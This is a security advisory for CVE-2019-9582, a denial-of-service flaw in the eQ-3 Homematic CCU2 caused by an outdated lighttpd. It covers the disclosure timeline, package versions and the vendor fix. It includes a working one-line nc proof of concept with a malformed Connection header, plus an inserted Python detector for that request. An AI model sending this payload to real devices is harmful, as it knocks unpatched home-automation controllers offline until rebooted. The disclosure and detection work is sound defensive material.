CVE-2019-9582 eQ-3 Homematic CCU2 outdated base software packages allows Denial of Service

Overview

  • CVE: CVE-2019-9582
  • Author: psytester
  • Title: eQ-3 Homematic CCU2 outdated base software packages allows Denial of Service
  • Vulnerability Type: CWE-400 Uncontrolled Resource Consumption
  • CVSSv3 Base Score: 7.5
  • CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
  • Publishing Date: 24.07.2019
  • Updated: 10.12.2019
  • Vendor: eQ-3 AG
  • Product: Homematic CCU2
  • Vendor contacted: 29.01.2019
  • Vendor confirmation: 27.04.2019
  • Vendor patch: 2.49.17 since 09.12.2019
  • Vendor Reference: [HMCCU-359] in changelog of CCU2
  • Affected Firmware version: 2.35.16, 2.41.5, 2.41.8, 2.41.9, 2.45.6, 2.45.7, 2.47.10, 2.47.12, 2.47.15, 2.47.20 tested

Background

From vendor’s website:
HomeMatic Central Control Unit CCU2

Homematic Central Control Unit is the central element of your Homematic system, offering a whole range of control, monitoring and configuration options for all the Homematic devices in your installation
[…]

Past eQ-3 press release about taking security updates seriously (published in German only, translated below):
[…]
It is important to eQ-3 that even those gaps are closed which play no role for most installations.
[…]
Although only users are affected who violate eQ-3's security advice or have not installed security updates for several years, eQ-3 gives such cases high priority and fixes the corresponding security gaps as quickly as possible after they become known, in new software versions and hotfixes.
[…]

Issue Description

The analysis of the underlying operating system of the CCU2 revealed that the device runs an embedded Linux built with Buildroot 2012.08 and BusyBox 1.20.2 (both from 2012), and that several other software packages in use are equally outdated.

Just to name a few:

Buildroot 2012.08
BusyBox: v1.20.2
OpenSSH: 6.0p1
wget: GNU Wget 1.13.4
lighttpd: 1.4.31
Up to CCU2 Firmware < 2.47.10: Java(TM) SE Embedded Runtime Environment (build 1.8.0_121-b13, profile compact3, headless)
Since CCU2 Firmware >= 2.47.10: Java(TM) SE Embedded Runtime Environment (build 1.8.0_201-b09, profile compact3, headless)
Tcl Tk: 8.2.3
....

A search of already known CVE entries showed that the lighttpd version in use is vulnerable to CVE-2012-5533.

This vulnerability can be exploited by unauthenticated attackers with network access to the web interface:

echo -ne "GET / HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: TC,,Keep-Alive\r\n\r\n" | nc 1.2.3.4 80

Afterwards the lighttpd process is permanently stuck at 99% CPU load and the CCU2's ReGa core process no longer responds because the resources are used up:

PID  PPID USER     STAT   VSZ %VSZ %CPU COMMAND
  321     1 root     R     5548   2%  99% /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf

Restarting the lighttpd process alone does not seem to be enough to clear the overload condition; a reboot is required.
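A defender-side check for the trigger described above, added here as an example and not part of the advisory or of the CCU2 firmware: it inspects captured HTTP requests for a Connection header containing an empty comma-separated token (the malformed input CVE-2012-5533 is known for), so such requests can be flagged at a reverse proxy or in a packet capture before the vulnerable lighttpd sees them. The sample requests are constructed for the example; the host 1.2.3.4 is the placeholder from the advisory, and any empty token is flagged conservatively, not only the ",," form shown in the PoC.

```python
"""Flag HTTP requests whose Connection header carries an empty token,
the malformed input associated with CVE-2012-5533 in lighttpd 1.4.31.
Constructed example, not code from the advisory or the CCU2 firmware."""
from typing import List

# Constructed sample requests. The first mirrors the advisory's trigger
# (placeholder host 1.2.3.4); the second is a benign Connection header;
# the third has a trailing empty token; the fourth has no Connection header.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: TC,,Keep-Alive\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: TE, Keep-Alive\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 1.2.3.4\r\nconnection: close,\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 1.2.3.4\r\n\r\n",
]


def header_values(raw_request: str, name: str) -> List[str]:
    """Return the values of every header called `name` (case-insensitive).

    Only the head section (before the blank line) is parsed; the request
    line is skipped and lines without a colon are ignored."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key.strip().lower() == name.lower():
            values.append(value.strip())
    return values


def has_empty_token(value: str) -> bool:
    """True if a comma-separated header value contains an empty token,
    e.g. 'TC,,Keep-Alive' or a trailing comma as in 'close,'."""
    return any(tok.strip() == "" for tok in value.split(","))


def is_cve_2012_5533_trigger(raw_request: str) -> bool:
    """True if any Connection header in the request has an empty token."""
    return any(has_empty_token(v) for v in header_values(raw_request, "Connection"))


def scan(requests: List[str]) -> List[bool]:
    """Apply the check to a list of raw requests, one verdict per request."""
    return [is_cve_2012_5533_trigger(r) for r in requests]


if __name__ == "__main__":
    for req, hit in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print("FLAGGED" if hit else "ok     ", repr(req.split("\r\n")[2] if hit else req))
```

On a real deployment the same check belongs in whatever sits in front of the CCU2's web interface, since the vulnerable server itself cannot be relied on to reject the request.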

There may be many more vulnerabilities, as described in my German blog post about outdated embedded Linux BusyBox/Buildroot installations.

CVE

CVE-2019-9582

CVSSv3 Base Score

CVSSv3 Base Score: 7.5

CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Base software updated since December 2019

10 months later the software is almost up to date and this CVE is fixed.

Buildroot: 2019.05
BusyBox: v1.30.1
OpenSSH: 7.9p1
wget: GNU Wget 1.20.3
lighttpd: 1.4.53
java version 1.8.0_201

BTW, this is strange but somehow expected: the newer CCU3 hardware now has an older software baseline. ;-)

Buildroot: 2018.08.2
BusyBox: v1.29.2
OpenSSH: 7.8p1
wget: GNU Wget 1.19.5
lighttpd: 1.4.50

Credit

All researchers.
cvedetails for scanning and preparing all CVEs, separated by vendor and product.
me, but I simply scanned known CVEs to use them.

Do you not own an original CCU2 or CCU3 but want to analyze the CCU ‘for free’?
You can download:
piVCCU for running the original CCU3 Firmware in lxc container on RaspberryPi
RaspberryMatic for running the opensource OCCU based release on different boards

Disclaimer

The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

The contents of this advisory are copyright (c) 2019 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

Written on December 10, 2019